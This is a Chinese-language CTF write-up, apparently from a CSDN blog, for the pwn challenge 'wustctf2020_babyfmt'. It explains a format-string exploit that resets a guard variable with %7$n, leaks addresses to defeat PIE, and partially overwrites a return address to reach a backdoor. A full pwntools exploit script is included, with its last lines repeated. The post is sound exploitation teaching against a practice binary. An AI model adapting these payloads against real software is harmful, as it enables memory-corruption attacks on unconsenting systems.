wustctf2020_babyfmt

已于 2022-04-07 00:23:16 修改
阅读量438 收藏
点赞数 4
分类专栏: pwn fmt 文章标签: pwn
于 2022-04-07 00:21:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Invin_cible/article/details/124003843
版权

一道简单fmt题,但是我搜解题记录时,觉得解得都挺复杂的。

似乎还没有文章用我的方法,那我就写一种简单的解法。

绕过fmt判断条件

我只用到了fmt_attack函数。

由于有一个判定条件:

unsigned __int64 __fastcall fmt_attack(int *a1)
{
  char format[56]; // [rsp+10h] [rbp-40h] BYREF
  unsigned __int64 v3; // [rsp+48h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  memset(format, 0, 0x30uLL);
  if ( *a1 > 0 )
  {
    puts("No way!");
    exit(1);
  }
  *a1 = 1;
  read_n(format, 40LL, format);
  printf(format);
  return __readfsqword(0x28u) ^ v3;

因此我们每次使用该函数时,将*a1处的值改为零即可循环利用该函数。

打断点,运行到代码*a1 = 1处

1

单步跟进,查看rax的值(a1地址)

2

运行到printf函数,查看a1的偏移

3

算上64位6个寄存器传参,偏移量+6,则a1偏移量为7。

则我们每次利用fmt_attack函数时,加上%7$n即可令*a1=0,即可重复利用fmt_attack。

更改返回地址为后门函数地址

运行到printf函数时,栈中会有许多函数返回地址。

其中第一条为fmt_attack函数的返回地址,

第二条是main函数的返回地址(main函数执行完会执行libc_start_main函数)。

由于本题开了pie保护,我们可以用partial write 篡改第一个返回地址。

4

注意:后门函数直接跳转到close函数后即可。

5

计算elf基址:

payload = b'%7$n+%17$p'
fmt(payload)
r.recvuntil(b'+')
ret_value = int(r.recvuntil(b'\n')[:-1],16)
elf_base = ret_value-0x102c

下一步直接更改低二字节即可。

低二字节值:

(elf_base+0xf56)&0xffff

完整exp

from pwn import *
r = process('/mnt/hgfs/ubuntu/BUUCTF/wustctf2020_babyfmt')
# r = remote('node4.buuoj.cn',29629)
secret_addr =0x202060

def fmt(payload):
    r.recvuntil(b">>")
    r.sendline(b'2')
    r.sendline(payload)

r.sendline(b'1')
r.sendline(b'2')
r.sendline(b'3')

fmt(b'%7$n-%16$p')
r.recvuntil(b'-')
ret_addr = int(r.recvuntil(b'\n')[:-1],16)-0x28

payload = b'%7$n+%17$p'
fmt(payload)
r.recvuntil(b'+')
ret_value = int(r.recvuntil(b'\n')[:-1],16)
elf_base = ret_value-0x102c

payload1 = b'%'+str((elf_base+0xf56)&0xffff).encode()+b'c%10$hn'
payload1 = payload1.ljust(0x10,b'a')
payload1+=p64(ret_addr)
fmt(payload1)
log.success("ret_value: "+hex(ret_value))
log.success("ret_addr: "+hex(ret_addr))
r.interactive()

fmt(payload1)
log.success("ret_value: "+hex(ret_value))
log.success("ret_addr: "+hex(ret_addr))
r.interactive()
Loτυs
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1674
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 890
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
星盟-pwn-babyfmt
qq_65147345的博客
07-29 237
泄露信息->改写rip->劫持程序流->调整输入大小->打开文件输出
BUUCTF:[WUSTCTF2020]朴实无华
末初的CSDN博客
06-24 1062
首先在下发现 访问有一个假的flag,但是在响应头中找到一个提示,另外还有一个值得注意的是这里是 访问得到 PHP5中的函数中科学计数法符号无效,只会当作正常字符处理 所以这里利用科学计数法的符号就可以绕过level 1level 2直接可参考我的这篇文章:浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题最后直接绕过和即可...
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
re学习笔记(56)WUSTCTF – Re方向WP
12-21
文章以一系列WUSTCTF逆向工程挑战为例,展示了如何利用逆向工程技术来解密和获取隐藏的flag。 首先,让我们看看WUSTCTF的"re-Cr0ssFun"挑战。在这个问题中,作者使用了IDA64(Interactive Disassembler)来加载64位...
Flash8help_cn.part4
01-13
Flash8help_cn.part4.共有6卷,须全部下载才能解压缩。flash 教程 帮助文档 动漫 计算机
linux操作系统入门实验报告
03-09
**Linux操作系统入门实验报告** 本实验报告主要针对Linux操作系统的基础知识和操作技能进行阐述,旨在帮助初学者快速熟悉这一开源操作系统。实验过程中,我们将通过实际操作来了解和掌握Linux的基本命令行界面,...
23种设计模式汇集       
07-09
比较系统的讲解了软件设计的23种设计模式,各种例子都有
某道Pwn(格式化字符串漏洞)
热门推荐
龙哥盟
03-18 4万+
格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。首先看这一段代码,什么比赛的题我忘了:#include <stdio.h> int main(void) { int flag = 0; int *p = &flag; char a[100]; scanf("%s",a); printf(a); if(flag ==
BUUCTF-pwn(9)
njh18790816639的博客
01-05 787
gyctf_2020_borrowstack 使用栈迁移,将rsp迁移到bss段上,而bss段上处于可控位置。但是注意bss段低处处于不可写状态,如果rsp移动到该处,则程序无法进行下去! 尝试使用system函数,但是往往会涉及到bss段低处地址,而one_gadget则不需要过多占用栈地址,故采用one_gadget获取权限! from pwn import * from LibcSearcher import LibcSearcher context(log_level='debug',os='l
WUST-CTF2020 writeup
abtgu的博客
04-02 1358
文章目录WEBcheckinadminMISCSpace ClubWelcome爬Find meShopgirlfriendAlison likes jojo WEB checkin 题目: 无 解题思路: 打开链接,发现提问作者,打开查看器,发现按钮被隐藏,输入框被限制,更改代码,输入作者名,提示一个博客 打开,在最上方发现flag的一部分 仔细查看,有一篇名为《远古的blog》的博客,打...
WUST-CTF 2020 WriteUp
weixin_45883223的博客
03-30 3105
WUST-CTF 2020 WriteUp前言WebcheckinadminCV Maker朴实无华Crypto大数运算情书B@sebabyrsa佛说:只能四天MiscSpace ClubWelcome爬Find megirlfriendShopReverseCr0ssFunlevel1 前言 又一次被“面向萌新,题目友好”给骗了,我还是tcl。 Web checkin 打开链接发现要提交作者的名...
2019.11.3 unctf babyfmt (格式化字符串任意地址的读和写)
DSR446的博客
11-03 1686
i春秋的一篇关于格式化字符串文章把任意地址的读和写讲的很清晰: https://bbs.ichunqiu.com/thread-43624-1-1.html 方法一:先输入一个 %p 泄露出数组的首地址,再retn处下个断点,用返回地址减去数组的首地址,计算出他们之间的相对偏移。因为栈的地址每次都是变化的,所以我们每次都要泄露栈的地址,然后计算出返回地址。 重要的步骤就是利用fmtstr_pa...
记一道CTF题babyphp之学习代码注入
xiaotaode2012的专栏
08-18 5328
0x00写在前面的话 最近打算刷刷CTF题目,提升一下自身的见识面,这里碰到了一个代码注入的题目特作记录,大牛勿喷。。。 0x01做题的整体思路 做题的地址,http://web.jarvisoj.com:32798/ 打开地址,随机点击发现都是展示对应的界面,做过开发的我,直觉告诉我应该是传入一个字符串展示对应页面,这样我随机点了一下,发现about里面有
pwn 网鼎杯 easyFMT
SsMing的博客
09-01 1971
作为一个菜狗子只能等大佬的writeup学习   才会做 easyFMT看名字就是到是格式化串洞,然后就是要确定存在格式化串洞的参数是第几个 确定为是print的第六个参数 大佬计算参数的脚本是: #!/usr/bin/python from pwn import * elf = ELF('./pwn') for i in xrange(1,100): p = proce...
linux fmt命令参数及用法详解---linux编排文本文件命令
lxpbs8851的专栏
03-14 1254
fmt(fromat) 功能说明:编排文本文件。 语  法:fmt [-cstu][-p][-w][--help][--version][文件...] 补充说明:fmt指令会从指定的文件里读取内容,将其依照指定格式重新编排后,输出到标准输出设备。若指定的文件名为"-",则fmt指令会从标准输入设备读取数据。 参  数:   -c或--crown-margin   每段前两列缩排。
[WUSTCTF2020]朴实无华
最新发布
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的md5值等于$md5本身,会输出另一条特定的字符串。在第三个关卡中,如果传入的参数$get_flag中不包含空格,则会将$get_flag传给系统函数进行执行,并输出一条特定的字符串。 关于题目的

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值